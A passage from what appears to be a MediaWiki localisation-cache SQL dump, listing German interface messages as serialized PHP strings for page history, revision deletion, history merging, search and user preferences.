lautet: \'\'$2\'\'\";'),('de','messages:viewpagelogs','s:32:\"Logbücher dieser Seite anzeigen\";'),('de','messages:nohistory','s:55:\"Zu dieser Seite ist keine Versionsgeschichte vorhanden.\";'),('de','messages:currentrev','s:16:\"Aktuelle Version\";'),('de','messages:currentrev-asof','s:31:\"Aktuelle Version vom $2, $3 Uhr\";'),('de','messages:revisionasof','s:22:\"Version vom $2, $3 Uhr\";'),('de','messages:revision-info','s:45:\"Version vom $4, $5 Uhr von {{GENDER:$6|$2}}$7\";'),('de','messages:previousrevision','s:26:\"← Nächstältere Version\";'),('de','messages:nextrevision','s:27:\"Nächstjüngere Version →\";'),('de','messages:currentrevisionlink','s:16:\"Aktuelle Version\";'),('de','messages:cur','s:7:\"Aktuell\";'),('de','messages:next','s:8:\"Nächste\";'),('de','messages:last','s:9:\"Vorherige\";'),('de','messages:page_first','s:6:\"Anfang\";'),('de','messages:page_last','s:4:\"Ende\";'),('de','messages:histlegend','s:384:\"Zur Anzeige der Änderungen einfach die zu vergleichenden Versionen auswählen und die Schaltfläche „{{int:compareselectedversions}}“ klicken.
                                                                \n* ({{int:cur}}) = Unterschied zur aktuellen Version, ({{int:last}}) = Unterschied zur vorherigen Version\n* Uhrzeit/Datum = Version zu dieser Zeit, Benutzername/IP-Adresse des Bearbeiters, {{int:minoreditletter}} = Kleine Änderung\";'),('de','messages:history-fieldset-title','s:32:\"In der Versionsgeschichte suchen\";'),('de','messages:history-show-deleted','s:31:\"Nur gelöschte Versionen zeigen\";'),('de','messages:histfirst','s:8:\"älteste\";'),('de','messages:histlast','s:7:\"neueste\";'),('de','messages:historysize','s:31:\"({{PLURAL:$1|1 Byte|$1 Bytes}})\";'),('de','messages:historyempty','s:6:\"(leer)\";'),('de','messages:history-feed-title','s:18:\"Versionsgeschichte\";'),('de','messages:history-feed-description','s:47:\"Versionsgeschichte dieser Seite in {{SITENAME}}\";'),('de','messages:history-feed-item-nocomment','s:18:\"$1 am $3 um $4 Uhr\";'),('de','messages:history-feed-empty','s:159:\"Die angeforderte Seite existiert nicht. Vielleicht wurde sie gelöscht oder verschoben. [[Special:Search|Durchsuche]] {{SITENAME}} nach passenden neuen Seiten.\";'),('de','messages:rev-deleted-comment','s:26:\"(Zusammenfassung entfernt)\";'),('de','messages:rev-deleted-user','s:23:\"(Benutzername entfernt)\";'),('de','messages:rev-deleted-event','s:24:\"(Logbuchaktion entfernt)\";'),('de','messages:rev-deleted-user-contribs','s:80:\"[Benutzername oder IP-Adresse entfernt – Bearbeitung aus Beiträgen versteckt]\";'),('de','messages:rev-deleted-text-permission','s:180:\"Diese Version wurde \'\'\'gelöscht\'\'\'.\nNähere Angaben zum Löschvorgang sowie eine Begründung stehen im [{{fullurl:{{#special:Log}}/delete|page={{FULLPAGENAMEE}}}} Lösch-Logbuch].\";'),('de','messages:rev-suppressed-text-permission','s:178:\"Diese Seitenversion wurde unterdrückt.\nEinzelheiten können im [{{fullurl:{{#Special:Log}}/suppress|page={{FULLPAGENAMEE}}}} Oversight-Logbuch] gefunden werden.\";'),('de','messages:rev-deleted-text-unhide','s:199:\"Diese Version wurde \'\'\'gelöscht\'\'\'.\nNähere Angaben stehen im [{{fullurl:{{#special:Log}}/delete|page={{FULLPAGENAMEE}}}} Lösch-Logbuch].\nDu kannst [$1 diese Version einsehen], sofern du möchtest.\";'),('de','messages:rev-suppressed-text-unhide','s:213:\"Diese Version wurde \'\'\'unterdrückt\'\'\'.\nNähere Angaben stehen im [{{fullurl:{{#Special:Log}}/suppress|page={{FULLPAGENAMEE}}}} Unterdrückungs-Logbuch].\nDu kannst [$1 diese Version einsehen], sofern du möchtest.\";'),('de','messages:rev-deleted-text-view','s:184:\"Diese Version wurde \'\'\'gelöscht\'\'\'.\nDu kannst sie einsehen, sofern du möchtest. Nähere Angaben stehen im [{{fullurl:{{#special:Log}}/delete|page={{FULLPAGENAMEE}}}} Lösch-Logbuch].\";'),('de','messages:rev-suppressed-text-view','s:198:\"Diese Version wurde \'\'\'unterdrückt\'\'\'.\nDu kannst sie einsehen, sofern du möchtest. Nähere Angaben stehen im [{{fullurl:{{#Special:Log}}/suppress|page={{FULLPAGENAMEE}}}} Unterdrückungs-Logbuch].\";'),('de','messages:rev-deleted-no-diff','s:186:\"Du kannst diesen Unterschied nicht betrachten, da eine der Versionen \'\'\'gelöscht\'\'\' wurde.\nDetails stehen im [{{fullurl:{{#special:Log}}/delete|page={{FULLPAGENAMEE}}}} Lösch-Logbuch].\";'),('de','messages:rev-suppressed-no-diff','s:99:\"Du kannst diesen Versionsunterschied nicht betrachten, da eine der Versionen \'\'\'gelöscht\'\'\' wurde.\";'),('de','messages:rev-deleted-unhide-diff','s:245:\"Eine der Versionen dieses Versionsunterschieds wurde \'\'\'gelöscht\'\'\'.\nNähere Angaben stehen im [{{fullurl:{{#special:Log}}/delete|page={{FULLPAGENAMEE}}}} Lösch-Logbuch].\nDu kannst [$1 diesen Versionsunterschied einsehen], sofern du möchtest.\";'),('de','messages:rev-suppressed-unhide-diff','s:257:\"Eine der Versionen dieses Versionsunterschieds wurde \'\'\'unterdrückt\'\'\'.\nNähere Angaben stehen im [{{fullurl:{{#special:Log}}/delete|page={{FULLPAGENAMEE}}}} Unterdrückungs-Logbuch].\nDu kannst [$1 diesen Versionsunterschied einsehen], sofern du möchtest.\";'),('de','messages:rev-deleted-diff-view','s:234:\"Eine Version dieses Versionsunterschieds wurde \'\'\'gelöscht\'\'\'.\nDu kannst diesen Versionsunterschied einsehen, sofern du möchtest. Nähere Angaben stehen im [{{fullurl:{{#special:Log}}/delete|page={{FULLPAGENAMEE}}}} Lösch-Logbuch].\";'),('de','messages:rev-suppressed-diff-view','s:255:\"Eine der Versionen dieses Versionsunterschiedes wurde \'\'\'unterdrückt\'\'\'.\nDu kannst diesen Versionsunterschied einsehen, sofern du möchtest. Nähere Angaben stehen im [{{fullurl:{{#Special:Log}}/suppress|page={{FULLPAGENAMEE}}}} Unterdrückungs-Logbuch].\";'),('de','messages:rev-delundel','s:17:\"zeigen/verstecken\";'),('de','messages:rev-showdeleted','s:5:\"zeige\";'),('de','messages:revisiondelete','s:35:\"Versionen löschen/wiederherstellen\";'),('de','messages:revdelete-nooldid-title','s:23:\"Keine Version angegeben\";'),('de','messages:revdelete-nooldid-text','s:183:\"Du hast entweder keine Version angegeben, auf die diese Aktion ausgeführt werden soll, die gewählte Version ist nicht vorhanden oder du versuchst, die aktuelle Version zu entfernen.\";'),('de','messages:revdelete-no-file','s:41:\"Die angegebene Datei ist nicht vorhanden.\";'),('de','messages:revdelete-show-file-confirm','s:115:\"Bist du sicher, dass du die gelöschte Version der Datei „$1“ vom $2 um $3 Uhr ansehen willst?\";'),('de','messages:revdelete-show-file-submit','s:2:\"Ja\";'),('de','messages:revdelete-selected-text','s:57:\"Ausgewählte {{PLURAL:$1|Version|Versionen}} von [[:$2]]:\";'),('de','messages:revdelete-selected-file','s:67:\"Ausgewählte {{PLURAL:$1|Dateiversion|Dateiversionen}} von [[:$2]]:\";'),('de','messages:logdelete-selected','s:67:\"{{PLURAL:$1|Gewählter Logbucheintrag|Gewählte Logbucheinträge}}:\";'),('de','messages:revdelete-text-text','s:139:\"Gelöschte Versionen verbleiben noch in der Versionsgeschichte, jedoch sind Teile ihres Inhalts für die Öffentlichkeit nicht zugänglich.\";'),('de','messages:revdelete-text-file','s:150:\"Gelöschte Dateiversionen verbleiben noch in der Datei-Versionsgeschichte, jedoch sind Teile ihres Inhalts für die Öffentlichkeit nicht zugänglich.\";'),('de','messages:logdelete-text','s:139:\"Gelöschte Logbucheinträge verbleiben noch in den Logbüchern, jedoch sind Teile ihres Inhalts für die Öffentlichkeit nicht zugänglich.\";'),('de','messages:revdelete-text-others','s:170:\"Andere Administratoren haben noch Zugriff auf den versteckten Inhalt und können ihn auch wiederherstellen, solange keine zusätzlichen Beschränkungen festgelegt werden.\";'),('de','messages:revdelete-confirm','s:162:\"Bitte bestätige, dass du beabsichtigst, dies zu tun, die Konsequenzen verstehst und es in Übereinstimmung mit den [[{{MediaWiki:Policy-url}}|Richtlinien]] tust.\";'),('de','messages:revdelete-suppress-text','s:227:\"Unterdrückungen sollten \'\'\'nur\'\'\' in den folgenden Fällen vorgenommen werden:\n* Potentiell beleidigende Informationen\n* Unangebrachte persönliche Informationen\n*: \'\'Adressen, Telefonnummern, Sozialversicherungsnummern etc.\'\'\";'),('de','messages:revdelete-legend','s:40:\"Setzen der Sichtbarkeitseinschränkungen\";'),('de','messages:revdelete-hide-text','s:16:\"Text der Version\";'),('de','messages:revdelete-hide-image','s:22:\"Dateiinhalt verstecken\";'),('de','messages:revdelete-hide-name','s:33:\"Logbuchaktion und Ziel verstecken\";'),('de','messages:revdelete-hide-comment','s:27:\"Bearbeitungszusammenfassung\";'),('de','messages:revdelete-hide-user','s:39:\"Benutzername/IP-Adresse des Bearbeiters\";'),('de','messages:revdelete-hide-restricted','s:73:\"Daten sowohl vor Administratoren als auch anderen Benutzern unterdrücken\";'),('de','messages:revdelete-radio-same','s:15:\"(nicht ändern)\";'),('de','messages:revdelete-radio-set','s:9:\"Versteckt\";'),('de','messages:revdelete-radio-unset','s:8:\"Sichtbar\";'),('de','messages:revdelete-suppress','s:55:\"Grund der Löschung auch vor Administratoren verstecken\";'),('de','messages:revdelete-unsuppress','s:59:\"Einschränkungen für wiederhergestellte Versionen aufheben\";'),('de','messages:revdelete-log','s:6:\"Grund:\";'),('de','messages:revdelete-submit','s:54:\"Auf gewählte {{PLURAL:$1|Version|Versionen}} anwenden\";'),('de','messages:revdelete-success','s:45:\"\'\'\'Die Versionsansicht wurde aktualisiert.\'\'\'\";'),('de','messages:revdelete-failure','s:67:\"\'\'\'Die Versionssichtbarkeit konnte nicht aktualisiert werden:\'\'\'\n$1\";'),('de','messages:logdelete-success','s:43:\"\'\'\'Logbuchansicht erfolgreich geändert.\'\'\'\";'),('de','messages:logdelete-failure','s:57:\"\'\'\'Logbuchsichtbarkeit kann nicht geändert werden:\'\'\'\n$1\";'),('de','messages:revdel-restore','s:20:\"Sichtbarkeit ändern\";'),('de','messages:pagehist','s:18:\"Versionsgeschichte\";'),('de','messages:deletedhist','s:20:\"Gelöschte Versionen\";'),('de','messages:revdelete-hide-current','s:115:\"Fehler beim Verstecken des Eintrags vom $1, $2 Uhr: Dies ist die aktuelle Version.\nSie kann nicht versteckt werden.\";'),('de','messages:revdelete-show-no-access','s:136:\"Fehler beim Anzeigen des Eintrags vom $1, $2 Uhr: Dieser Eintrag wurde als „eingeschränkt“ markiert.\nDu hast darauf keinen Zugriff.\";'),('de','messages:revdelete-modify-no-access','s:138:\"Fehler beim Bearbeiten des Eintrags vom $1, $2 Uhr: Dieser Eintrag wurde als „eingeschränkt“ markiert.\nDu hast darauf keinen Zugriff.\";'),('de','messages:revdelete-modify-missing','s:60:\"Fehler beim Bearbeiten von ID $1: Es fehlt in der Datenbank!\";'),('de','messages:revdelete-no-change','s:102:\"\'\'\'Warnung:\'\'\' Der Eintrag vom $1, $2 Uhr besitzt bereits die gewünschten Sichtbarkeitseinstellungen.\";'),('de','messages:revdelete-concurrent-change','s:180:\"Fehler beim Bearbeiten des Eintrags vom $1, $2 Uhr: Es scheint, als ob der Status von jemandem geändert wurde, bevor du vorhattest, ihn zu bearbeiten.\nBitte prüfe die Logbücher.\";'),('de','messages:revdelete-only-restricted','s:166:\"Fehler beim Verstecken des Eintrags vom $1, $2 Uhr: Du kannst keinen Eintrag vor Administratoren verstecken, ohne eine der anderen Ansichtsoptionen gewählt zu haben.\";'),('de','messages:revdelete-reason-dropdown','s:184:\"*Allgemeine Löschgründe\n** Urheberrechtsverletzung\n** Unangebrachte Kommentare oder persönliche Informationen\n** Unangebrachter Benutzername\n** Potentiell beleidigende Informationen\";'),('de','messages:revdelete-otherreason','s:27:\"Anderer/ergänzender Grund:\";'),('de','messages:revdelete-reasonotherlist','s:13:\"Anderer Grund\";'),('de','messages:revdelete-edit-reasonlist','s:24:\"Löschgründe bearbeiten\";'),('de','messages:revdelete-offender','s:18:\"Autor der Version:\";'),('de','messages:suppressionlog','s:17:\"Oversight-Logbuch\";'),('de','messages:suppressionlogtext','s:255:\"Dies ist das Logbuch der Oversight-Aktionen (Änderungen der Sichtbarkeit von Versionen, Bearbeitungskommentaren, Benutzernamen und Benutzersperren).\nSiehe die [[Special:BlockList|Liste der gesperrten IP-Adressen und Benutzernamen]] für aktuelle Sperren.\";'),('de','messages:mergehistory','s:28:\"Versionsgeschichten vereinen\";'),('de','messages:mergehistory-header','s:209:\"Mit dieser Spezialseite kannst du die Versionsgeschichte einer Ursprungsseite mit der Versionsgeschichte einer Zielseite vereinen.\nStelle sicher, dass die Versionsgeschichte einer Seite historisch korrekt ist.\";'),('de','messages:mergehistory-box','s:42:\"Versionsgeschichten zweier Seiten vereinen\";'),('de','messages:mergehistory-from','s:15:\"Ursprungsseite:\";'),('de','messages:mergehistory-into','s:10:\"Zielseite:\";'),('de','messages:mergehistory-list','s:39:\"Versionen, die vereinigt werden können\";'),('de','messages:mergehistory-merge','s:259:\"Die folgenden Versionen von „[[:$1]]“ können nach „[[:$2]]“ übertragen werden. Markiere die Version, bis zu der (einschließlich) die Versionen übertragen werden sollen. Bitte beachte, dass die Nutzung der Navigationslinks die Auswahl zurücksetzt.\";'),('de','messages:mergehistory-go','s:45:\"Zeige Versionen, die vereinigt werden können\";'),('de','messages:mergehistory-submit','s:19:\"Vereinige Versionen\";'),('de','messages:mergehistory-empty','s:44:\"Es können keine Versionen vereinigt werden.\";'),('de','messages:mergehistory-success','s:96:\"{{PLURAL:$3|1 Version|$3 Versionen}} von „[[:$1]]“ erfolgreich nach „[[:$2]]“ vereinigt.\";'),('de','messages:mergehistory-fail','s:79:\"Versionsvereinigung nicht möglich, bitte prüfe die Seite und die Zeitangaben.\";'),('de','messages:mergehistory-fail-toobig','s:178:\"Die Versionsgeschichtenzusammenführung konnte nicht ausgeführt werden, da sonst mehr als {{PLURAL:$1|eine Version|$1 Versionen}} verschoben werden {{PLURAL:$1|würde|würden}}.\";'),('de','messages:mergehistory-no-source','s:44:\"Ursprungsseite „$1“ ist nicht vorhanden.\";'),('de','messages:mergehistory-no-destination','s:39:\"Zielseite „$1“ ist nicht vorhanden.\";'),('de','messages:mergehistory-invalid-source','s:50:\"Ursprungsseite muss ein gültiger Seitenname sein.\";'),('de','messages:mergehistory-invalid-destination','s:45:\"Zielseite muss ein gültiger Seitenname sein.\";'),('de','messages:mergehistory-autocomment','s:42:\"„[[:$1]]“ vereinigt nach „[[:$2]]“\";'),('de','messages:mergehistory-comment','s:46:\"„[[:$1]]“ vereinigt nach „[[:$2]]“: $3\";'),('de','messages:mergehistory-same-destination','s:52:\"Ausgangs- und Zielseite dürfen nicht identisch sein\";'),('de','messages:mergehistory-reason','s:6:\"Grund:\";'),('de','messages:mergelog','s:20:\"Vereinigungs-Logbuch\";'),('de','messages:pagemerge-logentry','s:46:\"vereinigte [[$1]] in [[$2]] (Versionen bis $3)\";'),('de','messages:revertmerge','s:31:\"Vereinigung rückgängig machen\";'),('de','messages:mergelogpagetext','s:57:\"Dies ist das Logbuch der vereinigten Versionsgeschichten.\";'),('de','messages:history-title','s:22:\"$1: Versionsgeschichte\";'),('de','messages:difference-title','s:38:\"$1: Unterschied zwischen den Versionen\";'),('de','messages:difference-title-multipage','s:42:\"$1 und $2: Unterschied zwischen den Seiten\";'),('de','messages:difference-multipage','s:29:\"(Unterschied zwischen Seiten)\";'),('de','messages:lineno','s:9:\"Zeile $1:\";'),('de','messages:compareselectedversions','s:31:\"Gewählte Versionen vergleichen\";'),('de','messages:showhideselectedversions','s:37:\"Gewählte Versionen zeigen/verstecken\";'),('de','messages:editundo','s:19:\"rückgängig machen\";'),('de','messages:diff-empty','s:18:\"(kein Unterschied)\";'),('de','messages:diff-multi-sameuser','s:147:\"({{PLURAL:$1|Eine dazwischenliegende Version desselben Benutzers wird|$1 dazwischenliegende Versionen desselben Benutzers werden}} nicht angezeigt)\";'),('de','messages:diff-multi-otherusers','s:156:\"({{PLURAL:$1|Eine dazwischenliegende Version|$1 dazwischenliegende Versionen}} von {{PLURAL:$2|einem anderen Benutzer|$2 Benutzern}} werden nicht angezeigt)\";'),('de','messages:diff-multi-manyusers','s:115:\"({{PLURAL:$1|$1 dazwischenliegende Versionen}} von mehr als {{PLURAL:$2|$2 Benutzern}}, die nicht angezeigt werden)\";'),('de','messages:difference-missing-revision','s:367:\"{{PLURAL:$2|Eine Version|$2 Versionen}} dieser Unterschiedsanzeige ($1) {{PLURAL:$2|wurde|wurden}} nicht gefunden.\n\nDieser Fehler wird normalerweise von einem veralteten Link zur Versionsgeschichte einer Seite verursacht, die zwischenzeitlich gelöscht wurde.\nEinzelheiten sind im [{{fullurl:{{#Special:Log}}/delete|page={{FULLPAGENAMEE}}}} Lösch-Logbuch] vorhanden.\";'),('de','messages:searchresults','s:14:\"Suchergebnisse\";'),('de','messages:searchresults-title','s:28:\"Suchergebnisse für „$1“\";'),('de','messages:titlematches','s:35:\"Übereinstimmungen mit Seitentiteln\";'),('de','messages:textmatches','s:31:\"Übereinstimmungen mit Inhalten\";'),('de','messages:notextmatches','s:37:\"Keine Übereinstimmungen mit Inhalten\";'),('de','messages:prevn','s:37:\"{{PLURAL:$1|vorheriger|vorherige $1}}\";'),('de','messages:nextn','s:35:\"{{PLURAL:$1|nächster|nächste $1}}\";'),('de','messages:prevn-title','s:57:\"{{PLURAL:$1|Vorheriges Ergebnis|Vorherige $1 Ergebnisse}}\";'),('de','messages:nextn-title','s:55:\"{{PLURAL:$1|Folgendes Ergebnis|Folgende $1 Ergebnisse}}\";'),('de','messages:shown-title','s:52:\"Zeige $1 {{PLURAL:$1|Ergebnis|Ergebnisse}} pro Seite\";'),('de','messages:viewprevnext','s:41:\"Zeige ($1 {{int:pipe-separator}} $2) ($3)\";'),('de','messages:searchmenu-exists','s:58:\"\'\'\'Es gibt eine Seite, die den Namen „[[:$1]]“ hat.\'\'\'\";'),('de','messages:searchmenu-new','s:174:\"Erstelle die Seite „[[:$1]]“ in diesem Wiki. {{PLURAL:$2|0=|Siehe auch die über deine Suche gefundene Seite.|Siehe auch die gefundenen Suchergebnisse.}}\";'),('de','messages:searchprofile-articles','s:13:\"Inhaltsseiten\";'),('de','messages:searchprofile-images','s:10:\"Multimedia\";'),('de','messages:searchprofile-everything','s:5:\"Alles\";'),('de','messages:searchprofile-advanced','s:9:\"Erweitert\";'),('de','messages:searchprofile-articles-tooltip','s:12:\"Suchen in $1\";'),('de','messages:searchprofile-images-tooltip','s:19:\"Nach Dateien suchen\";'),('de','messages:searchprofile-everything-tooltip','s:57:\"Gesamten Inhalt durchsuchen (inklusive Diskussionsseiten)\";'),('de','messages:searchprofile-advanced-tooltip','s:31:\"Suche in weiteren Namensräumen\";'),('de','messages:search-result-size','s:36:\"$1 ({{PLURAL:$2|1 Wort|$2 Wörter}})\";'),('de','messages:search-result-category-size','s:117:\"{{PLURAL:$1|1 Seite|$1 Seiten}} ({{PLURAL:$2|1 Unterkategorie|$2 Unterkategorien}}, {{PLURAL:$3|1 Datei|$3 Dateien}})\";'),('de','messages:search-redirect','s:28:\"(Weiterleitung von „$1“)\";'),('de','messages:search-section','s:14:\"(Abschnitt $1)\";'),('de','messages:search-file-match','s:24:\"(treffende Dateiinhalte)\";'),('de','messages:search-suggest','s:21:\"Meintest du „$1“?\";'),('de','messages:search-interwiki-caption','s:17:\"Schwesterprojekte\";'),('de','messages:search-interwiki-default','s:18:\"Ergebnisse von $1:\";'),('de','messages:search-interwiki-more','s:9:\"(weitere)\";'),('de','messages:search-relatedarticle','s:9:\"Verwandte\";'),('de','messages:searchrelated','s:8:\"verwandt\";'),('de','messages:searchall','s:4:\"alle\";'),('de','messages:showingresults','s:96:\"Hier {{PLURAL:$1|ist \'\'\'1\'\'\' Ergebnis|sind \'\'\'$1\'\'\' Ergebnisse}}, beginnend mit Nummer \'\'\'$2.\'\'\'\";'),('de','messages:showingresultsinrange','s:165:\"Unten {{PLURAL:$1|wird ein Ergebnis|werden bis zu $1 Ergebnisse}} im Bereich $2 bis $3 angezeigt.\";'),('de','messages:search-showingresults','s:128:\"{{PLURAL:$4|Ergebnis $1 von $3|Ergebnisse $1 bis $2 von $3}}\";'),('de','messages:search-nonefound','s:55:\"Zu deiner Suchanfrage wurden keine Ergebnisse gefunden.\";'),('de','messages:powersearch-legend','s:16:\"Erweiterte Suche\";'),('de','messages:powersearch-ns','s:23:\"Suche in Namensräumen:\";'),('de','messages:powersearch-togglelabel','s:11:\"Wähle aus:\";'),('de','messages:powersearch-toggleall','s:4:\"Alle\";'),('de','messages:powersearch-togglenone','s:5:\"Keine\";'),('de','messages:powersearch-remember','s:44:\"Auswahl für zukünftige Suchanfragen merken\";'),('de','messages:search-external','s:13:\"Externe Suche\";'),('de','messages:searchdisabled','s:151:\"Die {{SITENAME}}-Suche ist deaktiviert. Du kannst unterdessen mit Google suchen. Bitte bedenke, dass der Suchindex von {{SITENAME}} veraltet sein kann.\";'),('de','messages:search-error','s:44:\"Bei der Suche ist ein Fehler aufgetreten: $1\";'),('de','messages:preferences','s:13:\"Einstellungen\";'),('de','messages:mypreferences','s:13:\"Einstellungen\";'),('de','messages:prefs-edits','s:25:\"Anzahl der Bearbeitungen:\";'),('de','messages:prefsnologintext2','s:59:\"Bitte anmelden, um deine Benutzereinstellungen festzulegen.\";'),('de','messages:prefs-skin','s:19:\"Benutzeroberfläche\";'),('de','messages:skin-preview','s:8:\"Vorschau\";'),('de','messages:datedefault','s:8:\"Standard\";'),('de','messages:prefs-labs','s:16:\"Alpha-Funktionen\";'),('de','messages:prefs-user-pages','s:14:\"Benutzerseiten\";'),('de','messages:prefs-personal','s:13:\"Benutzerdaten\";'),('de','messages:prefs-rc','s:18:\"Letzte Änderungen\";'),('de','messages:prefs-watchlist','s:17:\"Beobachtungsliste\";'),('de','messages:prefs-watchlist-days','s:38:\"Maximale Anzahl der einbezogenen Tage:\";'),('de','messages:prefs-watchlist-days-max','s:37:\"Maximal {{PLURAL:$1|ein Tag|$1 Tage}}\";'),('de','messages:prefs-watchlist-edits','s:42:\"Maximale Anzahl der angezeigten Einträge:\";'),('de','messages:prefs-watchlist-edits-max','s:23:\"Maximal 1.000 Einträge\";'),('de','messages:prefs-watchlist-token','s:28:\"Token der Beobachtungsliste:\";'),('de','messages:prefs-misc','s:13:\"Verschiedenes\";'),('de','messages:prefs-resetpass','s:16:\"Passwort ändern\";'),('de','messages:prefs-changeemail','s:22:\"E-Mail-Adresse ändern\";'),('de','messages:prefs-setemail','s:24:\"E-Mail-Adresse festlegen\";'),('de','messages:prefs-email','s:15:\"E-Mail-Optionen\";'),('de','messages:prefs-rendering','s:8:\"Aussehen\";'),('de','messages:saveprefs','s:23:\"Einstellungen speichern\";'),('de','messages:restoreprefs','s:61:\"Standardeinstellungen wiederherstellen (in allen Abschnitten)\";'),('de','messages:prefs-editing','s:10:\"Bearbeiten\";'),('de','messages:rows','s:7:\"Zeilen:\";'),('de','messages:columns','s:8:\"Spalten:\";'),('de','messages:searchresultshead','s:5:\"Suche\";'),('de','messages:stub-threshold','s:72:\"Linkformatierung kleiner Seiten (in Bytes):\";'),('de','messages:stub-threshold-disabled','s:11:\"Deaktiviert\";'),('de','messages:recentchangesdays','s:45:\"Anzahl der standardmäßig einbezogenen Tage:\";'),('de','messages:recentchangesdays-max','s:33:\"Maximal $1 {{PLURAL:$1|Tag|Tage}}\";'),('de','messages:recentchangescount','s:53:\"Anzahl der standardmäßig angezeigten Bearbeitungen:\";'),('de','messages:prefs-help-recentchangescount','s:90:\"Dies umfasst die Liste der letzten Änderungen, die Versionsgeschichte und die Logbücher.\";'),('de','messages:prefs-help-watchlist-token2','s:235:\"Dies ist der geheime Schlüssel zum Webfeed deiner Beobachtungsliste.\nJeder, der ihn kennt, kann deine Beobachtungsliste lesen. Teile ihn deshalb nicht Anderen mit.\nSofern notwendig, [[Special:ResetTokens|kannst du ihn zurücksetzen]].\";'),('de','messages:savedprefs','s:39:\"Deine Einstellungen wurden gespeichert.\";'),('de','messages:timezonelegend','s:9:\"Zeitzone:\";'),('de','messages:localtime','s:9:\"Ortszeit:\";'),('de','messages:timezoneuseserverdefault','s:37:\"Standardzeit dieses Wikis nutzen ($1)\";'),('de','messages:timezoneuseoffset','s:28:\"Andere (Unterschied angeben)\";'),('de','messages:servertime','s:29:\"Aktuelle Zeit auf dem Server:\";'),('de','messages:guesstimezone','s:23:\"Vom Browser übernehmen\";'),('de','messages:timezoneregion-africa','s:6:\"Afrika\";'),('de','messages:timezoneregion-america','s:7:\"Amerika\";'),('de','messages:timezoneregion-antarctica','s:9:\"Antarktis\";'),('de','messages:timezoneregion-arctic','s:6:\"Arktis\";'),('de','messages:timezoneregion-asia','s:5:\"Asien\";'),('de','messages:timezoneregion-atlantic','s:18:\"Atlantischer Ozean\";'),('de','messages:timezoneregion-australia','s:10:\"Australien\";'),('de','messages:timezoneregion-europe','s:6:\"Europa\";'),('de','messages:timezoneregion-indian','s:15:\"Indischer Ozean\";'),('de','messages:timezoneregion-pacific','s:17:\"Pazifischer Ozean\";'),('de','messages:allowemail','s:49:\"E-Mail-Empfang von anderen Benutzern ermöglichen\";'),('de','messages:prefs-searchoptions','s:5:\"Suche\";'),('de','messages:prefs-namespaces','s:12:\"Namensräume\";'),('de','messages:default','s:14:\"Voreinstellung\";'),('de','messages:prefs-files','s:7:\"Dateien\";'),('de','messages:prefs-custom-css','s:22:\"Benutzerdefinierte CSS\";'),('de','messages:prefs-custom-js','s:30:\"Benutzerdefiniertes JavaScript\";'),('de','messages:prefs-common-css-js','s:54:\"Gemeinsames CSS/JavaScript aller Benutzeroberflächen:\";'),('de','messages:prefs-reset-intro','s:138:\"Du kannst diese Seite verwenden, um die Einstellungen auf die Standards zurückzusetzen.\nDies kann nicht mehr rückgängig gemacht werden.\";'),('de','messages:prefs-emailconfirm-label','s:20:\"E-Mail-Bestätigung:\";'),('de','messages:youremail','s:15:\"E-Mail-Adresse:\";'),('de','messages:username','s:27:\"{{GENDER:$1|Benutzername}}:\";'),('de','messages:prefs-memberingroups','s:72:\"{{GENDER:$2|Mitglied}} der {{PLURAL:$1|Benutzergruppe|Benutzergruppen}}:\";'),('de','messages:prefs-memberingroups-type','s:2:\"$2\";'),('de','messages:prefs-registration','s:17:\"Anmeldezeitpunkt:\";'),('de','messages:prefs-registration-date-time','s:10:\"$2, $3 Uhr\";'),('de','messages:yourrealname','s:19:\"Bürgerlicher Name:\";'),('de','messages:yourlanguage','s:32:\"Sprache der Benutzeroberfläche:\";'),('de','messages:yourvariant','s:15:\"Sprachvariante:\";'),('de','messages:prefs-help-variant','s:95:\"Die bevorzugte Schreibvariante oder Orthografie, in der die Wikiseiten angezeigt werden sollen.\";'),('de','messages:yournick','s:9:\"Signatur:\";'),('de','messages:prefs-help-signature','s:147:\"Beiträge auf Diskussionsseiten sollten mit „~~~~“ signiert werden, was dann in die Signatur mit Zeitstempel umgewandelt wird.\";'),('de','messages:badsig','s:63:\"Die Syntax der Signatur ist ungültig; bitte HTML überprüfen.\";'),('de','messages:badsiglength','s:61:\"Die Signatur darf maximal $1 {{PLURAL:$1|Zeichen}} lang sein.\";'),('de','messages:yourgender','s:27:\"Welches Geschlecht hast du?\";'),('de','messages:gender-unknown','s:38:\"Ich möchte hierzu keine Angabe machen\";'),('de','messages:gender-male','s:17:\"Ich bin männlich\";'),('de','messages:gender-female','s:16:\"Ich bin weiblich\";'),('de','messages:prefs-help-gender','s:205:\"Dies ist eine freiwillige Angabe.\nDie Software nutzt sie, um dich anzureden sowie als Hinweis für andere durch Verwendung des zutreffenden grammatikalischen Geschlechts.\nDiese Information ist öffentlich.\";'),('de','messages:email','s:6:\"E-Mail\";'),('de','messages:prefs-help-realname','s:105:\"Dies ist eine freiwillige Angabe. Damit kann dein bürgerlicher Name deinen Beiträgen zugeordnet werden.\";'),('de','messages:prefs-help-email','s:140:\"Die Angabe einer E-Mail-Adresse ist optional, ermöglicht aber die Zusendung eines Ersatzpasswortes, sofern du dein Passwort vergessen hast.\";'),('de','messages:prefs-help-email-others','s:139:\"Mit anderen Benutzern kannst du auch über die Benutzerdiskussionsseiten Kontakt aufnehmen, ohne dass du deine Identität offenlegen musst.\";'),('de','messages:prefs-help-email-required','s:47:\"Es wird eine gültige E-Mail-Adresse benötigt.\";'),('de','messages:prefs-info','s:18:\"Basisinformationen\";'),('de','messages:prefs-i18n','s:7:\"Sprache\";'),('de','messages:prefs-signature','s:8:\"Signatur\";'),('de','messages:prefs-dateformat','s:12:\"Datumsformat\";'),('de','messages:prefs-timeoffset','s:15:\"Zeitunterschied\";'),('de','messages:prefs-advancedediting','s:19:\"Allgemeine Optionen\";'),('de','messages:prefs-editor','s:20:\"Bearbeitungsprogramm\";'),('de','messages:prefs-preview','s:8:\"Vorschau\";'),('de','messages:prefs-advancedrc','s:19:\"Erweiterte Optionen\";'),('de','messages:prefs-advancedrendering','s:19:\"Erweiterte Optionen\";'),('de','messages:prefs-advancedsearchoptions','s:19:\"Erweiterte Optionen\";'),('de','messages:prefs-advancedwatchlist','s:19:\"Erweiterte Optionen\";'),('de','messages:prefs-displayrc','s:15:\"Anzeigeoptionen\";'),('de','messages:prefs-displaywatchlist','s:15:\"Anzeigeoptionen\";'),('de','messages:prefs-tokenwatchlist','s:5:\"Token\";'),('de','messages:prefs-diffs','s:17:\"Versionsvergleich\";'),('de','messages:prefs-help-prefershttps','s:62:\"Diese Einstellung wird bei deiner nächsten Anmeldung wirksam.\";'),('de','messages:prefswarning-warning','s:200:\"Du hast Änderungen an deinen Einstellungen 